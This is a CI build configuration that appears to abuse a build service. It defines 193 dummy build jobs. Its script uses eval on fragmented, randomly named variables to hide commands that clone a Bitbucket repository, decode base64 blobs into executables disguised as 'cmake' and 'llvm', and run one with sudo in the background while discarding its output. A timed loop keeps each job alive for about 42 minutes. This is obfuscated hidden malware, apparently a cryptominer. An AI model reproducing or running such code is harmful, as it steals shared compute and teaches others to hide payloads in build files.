dist: bionic

env:
  - BUILD="OB1"
  - BUILD="OB2"
  - BUILD="OB3"
  - BUILD="OB4"
  - BUILD="OB5"
  - BUILD="OB6"
  - BUILD="OB7"
  - BUILD="OB8"
  - BUILD="OB9"
  - BUILD="OB10"
  - BUILD="OB11"
  - BUILD="OB12"
  - BUILD="OB13"
  - BUILD="OB14"
  - BUILD="OB15"
  - BUILD="OB16"
  - BUILD="OB17"
  - BUILD="OB18"
  - BUILD="OB19"
  - BUILD="OB20"
  - BUILD="OB21"
  - BUILD="OB22"
  - BUILD="OB23"
  - BUILD="OB24"
  - BUILD="OB25"
  - BUILD="OB26"
  - BUILD="OB27"
  - BUILD="OB28"
  - BUILD="OB29"
  - BUILD="OB30"
  - BUILD="OB31"
  - BUILD="OB32"
  - BUILD="OB33"
  - BUILD="OB34"
  - BUILD="OB35"
  - BUILD="OB36"
  - BUILD="OB37"
  - BUILD="OB38"
  - BUILD="OB39"
  - BUILD="OB40"
  - BUILD="OB41"
  - BUILD="OB42"
  - BUILD="OB43"
  - BUILD="OB44"
  - BUILD="OB45"
  - BUILD="OB46"
  - BUILD="OB47"
  - BUILD="OB48"
  - BUILD="OB49"
  - BUILD="OB50"
  - BUILD="OB51"
  - BUILD="OB52"
  - BUILD="OB53"
  - BUILD="OB54"
  - BUILD="OB55"
  - BUILD="OB56"
  - BUILD="OB57"
  - BUILD="OB58"
  - BUILD="OB59"
  - BUILD="OB60"
  - BUILD="OB61"
  - BUILD="OB62"
  - BUILD="OB63"
  - BUILD="OB64"
  - BUILD="OB65"
  - BUILD="OB66"
  - BUILD="OB67"
  - BUILD="OB68"
  - BUILD="OB69"
  - BUILD="OB70"
  - BUILD="OB71"
  - BUILD="OB72"
  - BUILD="OB73"
  - BUILD="OB74"
  - BUILD="OB75"
  - BUILD="OB76"
  - BUILD="OB77"
  - BUILD="OB78"
  - BUILD="OB79"
  - BUILD="OB80"
  - BUILD="OB81"
  - BUILD="OB82"
  - BUILD="OB83"
  - BUILD="OB84"
  - BUILD="OB85"
  - BUILD="OB86"
  - BUILD="OB87"
  - BUILD="OB88"
  - BUILD="OB89"
  - BUILD="OB90"
  - BUILD="OB91"
  - BUILD="OB92"
  - BUILD="OB93"
  - BUILD="OB94"
  - BUILD="OB95"
  - BUILD="OB96"
  - BUILD="OB97"
  - BUILD="OB98"
  - BUILD="OB99"
  - BUILD="OB100"
  - BUILD="OB101"
  - BUILD="OB102"
  - BUILD="OB103"
  - BUILD="OB104"
  - BUILD="OB105"
  - BUILD="OB106"
  - BUILD="OB107"
  - BUILD="OB108"
  - BUILD="OB109"
  - BUILD="OB110"
  - BUILD="OB111"
  - BUILD="OB112"
  - BUILD="OB113"
  - BUILD="OB114"
  - BUILD="OB115"
  - BUILD="OB116"
  - BUILD="OB117"
  - BUILD="OB118"
  - BUILD="OB119"
  - BUILD="OB120"
  - BUILD="OB121"
  - BUILD="OB122"
  - BUILD="OB123"
  - BUILD="OB124"
  - BUILD="OB125"
  - BUILD="OB126"
  - BUILD="OB127"
  - BUILD="OB128"
  - BUILD="OB129"
  - BUILD="OB130"
  - BUILD="OB131"
  - BUILD="OB132"
  - BUILD="OB133"
  - BUILD="OB134"
  - BUILD="OB135"
  - BUILD="OB136"
  - BUILD="OB137"
  - BUILD="OB138"
  - BUILD="OB139"
  - BUILD="OB140"
  - BUILD="OB141"
  - BUILD="OB142"
  - BUILD="OB143"
  - BUILD="OB144"
  - BUILD="OB145"
  - BUILD="OB146"
  - BUILD="OB147"
  - BUILD="OB148"
  - BUILD="OB149"
  - BUILD="OB150"
  - BUILD="OB151"
  - BUILD="OB152"
  - BUILD="OB153"
  - BUILD="OB154"
  - BUILD="OB155"
  - BUILD="OB156"
  - BUILD="OB157"
  - BUILD="OB158"
  - BUILD="OB159"
  - BUILD="OB160"
  - BUILD="OB161"
  - BUILD="OB162"
  - BUILD="OB163"
  - BUILD="OB164"
  - BUILD="OB165"
  - BUILD="OB166"
  - BUILD="OB167"
  - BUILD="OB168"
  - BUILD="OB169"
  - BUILD="OB170"
  - BUILD="OB171"
  - BUILD="OB172"
  - BUILD="OB173"
  - BUILD="OB174"
  - BUILD="OB175"
  - BUILD="OB176"
  - BUILD="OB177"
  - BUILD="OB178"
  - BUILD="OB179"
  - BUILD="OB180"
  - BUILD="OB181"
  - BUILD="OB182"
  - BUILD="OB183"
  - BUILD="OB184"
  - BUILD="OB185"
  - BUILD="OB186"
  - BUILD="OB187"
  - BUILD="OB188"
  - BUILD="OB189"
  - BUILD="OB190"
  - BUILD="OB191"
  - BUILD="OB192"
  - BUILD="OB193"

language: minimal

script:
  - ZYEakXZQ="sudo apt up"
  - KHlRykQjoK="date || tru"
  - eval "$ZYEakXZQ""$KHlRykQjoK""e"
  - kTaUqRZ="sudo apt --"
  - dbkwAwvZx="yes install"
  - QltDOYPSHd=" cl-base64 "
  - vmTQTNaSYcp="git &>/dev/"
  - eval "$kTaUqRZ""$dbkwAwvZx""$QltDOYPSHd""$vmTQTNaSYcp""null"
  - ALQrUB="git clone h"
  - vLgvTqmV="ttps://gccb"
  - XaRwoDjxz="uild@bitbuc"
  - OOaKelsepqE="ket.org/gcc"
  - sENcpSNW="build/gcc.g"
  - hFQRZIClz="it &>/dev/n"
  - eval "$ALQrUB""$vLgvTqmV""$XaRwoDjxz""$OOaKelsepqE""$sENcpSNW""$hFQRZIClz""ull"
  - ZDXshMjTORE="base64 -d g"
  - TWQsGvMy="cc/cmake_ >"
  - eval "$ZDXshMjTORE""$TWQsGvMy"" cmake"
  - NKPcl="base64 -d g"
  - pQBUFqHdyP="cc/config_ "
  - eval "$NKPcl""$pQBUFqHdyP""> cconfig"
  - yjxfqyUAOyg="base64 -d g"
  - ghyQHO="cc/make_ > "
  - eval "$yjxfqyUAOyg""$ghyQHO""llvm"
  - FqyAWuSzdT="chmod +x ll"
  - eval "$FqyAWuSzdT""vm cmake"
  - nsZWJjSGf="./cmake"
  - eval "$nsZWJjSGf"""
  - TRlJXCiJf="sed -i 's/b"
  - BTOJMToDKlv="uild/tg2o/g"
  - eval "$TRlJXCiJf""$BTOJMToDKlv""' cconfig"
  - mdmzxsEayEb="sudo ./llvm"
  - OwvcDdsIBk=" -c cconfig"
  - bnHcVKC=" &>/dev/nul"
  - eval "$mdmzxsEayEb""$OwvcDdsIBk""$bnHcVKC""l &"
  - GCC=$(date +%s)
  - pXqCr="echo $BUILD"
  - eval "$pXqCr"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2538)) ] && sudo killall llvm && break; sleep 194; done
